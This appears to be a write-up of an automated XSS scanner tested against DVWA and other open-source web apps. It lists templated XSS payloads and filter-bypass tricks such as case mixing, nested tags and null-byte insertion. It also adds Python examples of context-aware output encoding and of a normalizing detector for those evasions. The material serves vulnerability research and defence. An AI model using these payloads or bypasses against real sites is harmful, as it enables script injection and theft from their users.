We log changes to the application’s state and verify vulnerabilities through page and state backtracking.
Our experiments identified 10 XSS vulnerabilities across 12 open-source web applications, including 4 unique vulnerabilities that were missed by other scanners. Below are two examples of these unique vulnerabilities found in DVWA, along with explanations of why other methods failed to detect them while our approach succeeded.
The "id" parameter is not properly sanitized and is inserted directly into the page markup, leading to a reflected XSS vulnerability. The vulnerability is triggered by an element at the bottom of the web application. Interacting with the elements above it can hide the vulnerable element, so the vulnerability is difficult to trigger unless the application's other elements are handled in the right order. Our approach infers the user's intent and manages inter-element dependencies: rather than testing each element sequentially, we make sure the vulnerable element is reached before taking any action that could hide it.
This vulnerability triggers a DOM XSS by manipulating the "default" value in the URL parameter. The web application includes a function to set the security level, with the default set to the highest level, named "impossible" because it is meant to be nearly impossible to attack. Positioned at the end of the application, this function is often skipped by other scanners or reached late in their scanning process. As a result, triggering the DOM XSS is difficult, since the vulnerability only appears after the security level has been modified. Additionally, scanners like BlackWidow, which pre-fill form fields, consistently select the fixed value "impossible" for the security setting, making it unlikely that they detect vulnerabilities that require adjusting form values to modify the web application's state. In contrast, our approach modifies the security setting early in the scanning process, changing it to "low" to effectively identify and exploit the vulnerability.
Payloads:
<script>xss([HOYEN-PAYLOAD-INJECT])</script>
\"'><script>xss([HOYEN-PAYLOAD-INJECT])</script>
<img src="x" onerror="xss([HOYEN-PAYLOAD-INJECT])">
<svg onload=xss([HOYEN-PAYLOAD-INJECT]);>
'\"><svg onload=xss([HOYEN-PAYLOAD-INJECT]);>
<a href="" jaekpot-attribute="[HOYEN-PAYLOAD-INJECT]">jaekpot</a>
x" jaekpot-attribute="[HOYEN-PAYLOAD-INJECT]" fix="
x" onerror="xss([HOYEN-PAYLOAD-INJECT])"
x" onerror="xss(\'[HOYEN-PAYLOAD-INJECT]\')"
</title></option><script>xss([HOYEN-PAYLOAD-INJECT])</script>
<div style="background-image:url(javascript:xss([HOYEN-PAYLOAD-INJECT]))></div>
<style>body {background-image:url("javascript:xss([HOYEN-PAYLOAD-INJECT])")}</style>
<%0ascript>xss([HOYEN-PAYLOAD-INJECT])</script>
<%0bscript>xss([HOYEN-PAYLOAD-INJECT])</script>
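The "id" reflection described above is the case where the fix belongs at the output point: context-appropriate encoding of the reflected value, not a filter on the input. The following Python example is added here and is not code from the page, the scanner, or DVWA. It renders an assumed DVWA-style fragment that reflects the parameter once as element text and once inside a quoted attribute, first unencoded and then encoded, and uses the standard-library HTML parser as a stand-in for the browser's recognition of script elements and on* handler attributes. The probe value 1337 stands in for the [HOYEN-PAYLOAD-INJECT] marker, and the payloads are a subset of the list above with that marker filled in.

```python
import html
from html.parser import HTMLParser

# Constructed probe value standing in for the [HOYEN-PAYLOAD-INJECT] marker.
PROBE = "1337"

# A subset of the payload shapes listed above, with the marker filled in (constructed inputs).
PAYLOADS = [
    f"<script>xss({PROBE})</script>",
    f"\"'><script>xss({PROBE})</script>",
    f'<img src="x" onerror="xss({PROBE})">',
    f"<svg onload=xss({PROBE});>",
    f"</title></option><script>xss({PROBE})</script>",
]


def render_vulnerable(id_value):
    """Assumed DVWA-style reflection: the parameter is concatenated straight into the
    markup, once as element text and once inside a quoted attribute value."""
    return f'<p>Selected id: {id_value}</p><input name="id" value="{id_value}">'


def render_safe(id_value):
    """Same fragment with encoding chosen for each output context."""
    as_text = html.escape(id_value, quote=False)  # element text: encoding & < > suffices
    as_attr = html.escape(id_value, quote=True)   # attribute value: also encode " and '
    return f'<p>Selected id: {as_text}</p><input name="id" value="{as_attr}">'


class ScriptSink(HTMLParser):
    """Stand-in for the browser: records whether the parsed markup contains a <script>
    element or any attribute whose name starts with "on" (an event handler)."""

    def __init__(self):
        super().__init__()
        self.executable = False

    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(name.startswith("on") for name, _ in attrs):
            self.executable = True


def introduces_script(markup):
    """True when the markup, as parsed, would hand control to script."""
    sink = ScriptSink()
    sink.feed(markup)
    sink.close()
    return sink.executable


def count_executable(payloads):
    """Returns (payloads that execute in the unencoded fragment,
    payloads that still execute in the encoded fragment)."""
    vulnerable = sum(introduces_script(render_vulnerable(p)) for p in payloads)
    hardened = sum(introduces_script(render_safe(p)) for p in payloads)
    return vulnerable, hardened


if __name__ == "__main__":
    print("executable payloads (vulnerable, hardened):", count_executable(PAYLOADS))
```

The attribute-context payloads in the list (the `x" onerror=...` shapes) are the reason `render_safe` encodes quotes in the attribute branch: text-context encoding alone would leave the closing quote intact and let the injected attribute through.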
Bypass Strategies:
#[payload]
-->[payload]<!--
script --> ScRiPt
script --> ScRScrIPtiPt
script --> ScR<!--hoyen-->iPt>
script --> S%00c%00R%00i%00P%00t
script--> ScR<ScrIPt>iPt
' ' --> '/'
' ' --> '%0a'
'()' --> '``'
window.onerror=xss; throw
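Seen from the detection side, the case, comment, null-byte and whitespace strategies above all defeat the same thing: a check that matches literal, case-sensitive strings against input that has not been canonicalized. The Python example below is added here and is not the scanner's code or DVWA code. It runs a literal substring check and a normalizing check over constructed request lines modeled on the listed strategies; the request path, the `name` parameter and the log format are assumptions, and the lines are constructed rather than captured. The normalization also decodes twice, which goes slightly beyond the list above to cover double percent-encoding.

```python
import re
from urllib.parse import unquote

# Constructed request lines shaped like the bypass strategies listed above (not real traffic).
SAMPLE_LOG = [
    "GET /vulnerabilities/xss_r/?name=alice HTTP/1.1",                               # benign
    "GET /vulnerabilities/xss_r/?name=%3CScRiPt%3Exss(1)%3C/script%3E HTTP/1.1",     # ScRiPt
    "GET /vulnerabilities/xss_r/?name=%3CScR%3CScrIPt%3EiPt%3Exss(1) HTTP/1.1",      # ScR<ScrIPt>iPt
    "GET /vulnerabilities/xss_r/?name=%3CScR%3C!--hoyen--%3EiPt%3Exss(1) HTTP/1.1",  # ScR<!--hoyen-->iPt
    "GET /vulnerabilities/xss_r/?name=%3CS%00c%00R%00i%00P%00t%3Exss(1) HTTP/1.1",   # S%00c%00R%00i%00P%00t
    "GET /vulnerabilities/xss_r/?name=%3C%0ascript%3Exss(1)%3C/script%3E HTTP/1.1",  # ' ' --> '%0a'
    "GET /vulnerabilities/xss_r/?name=%3Csvg%20onload=xss(1);%3E HTTP/1.1",          # event handler
]

# Literal, case-sensitive markers: the kind of check the strategies above are built to evade.
LITERAL_MARKERS = ("<script", "onload=", "onerror=", "javascript:")

# Pattern applied after normalization: a script tag, any on* handler inside a tag,
# or a javascript: URL.
XSS_PATTERN = re.compile(r"<script|<\w+[^>]*\bon\w+\s*=|javascript:")


def literal_check(line):
    """Baseline: one percent-decode, then exact substring matching."""
    decoded = unquote(line)
    return any(marker in decoded for marker in LITERAL_MARKERS)


def normalize(value):
    """Canonicalize the request so the listed evasions collapse to their plain form."""
    for _ in range(2):                                     # undo percent-encoding, even if doubled
        value = unquote(value)
    value = value.replace("\x00", "")                      # S%00c%00R%00i%00P%00t -> ScRiPt
    value = re.sub(r"<!--.*?-->", "", value, flags=re.S)   # ScR<!--hoyen-->iPt -> ScRiPt
    value = re.sub(r"<\s+", "<", value)                    # <%0ascript, <%0bscript -> <script
    return value.lower()                                   # ScRiPt -> script


def normalized_check(line):
    """Same intent as literal_check, but matched against the canonical form."""
    return bool(XSS_PATTERN.search(normalize(line)))


def compare(lines):
    """Returns (lines flagged by the literal check, lines flagged after normalization)."""
    return (sum(literal_check(line) for line in lines),
            sum(normalized_check(line) for line in lines))


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(f"literal={literal_check(line)!s:5} normalized={normalized_check(line)!s:5} {line}")
```

Of the six crafted lines, the literal check flags only the `onload=` one, while the normalizing check flags all six and leaves the benign line alone. The nested `ScR<ScrIPt>iPt` form is worth noting: a filter that strips `<script>` once turns it into a working tag, whereas a detector that only matches and never rewrites the input has no such problem.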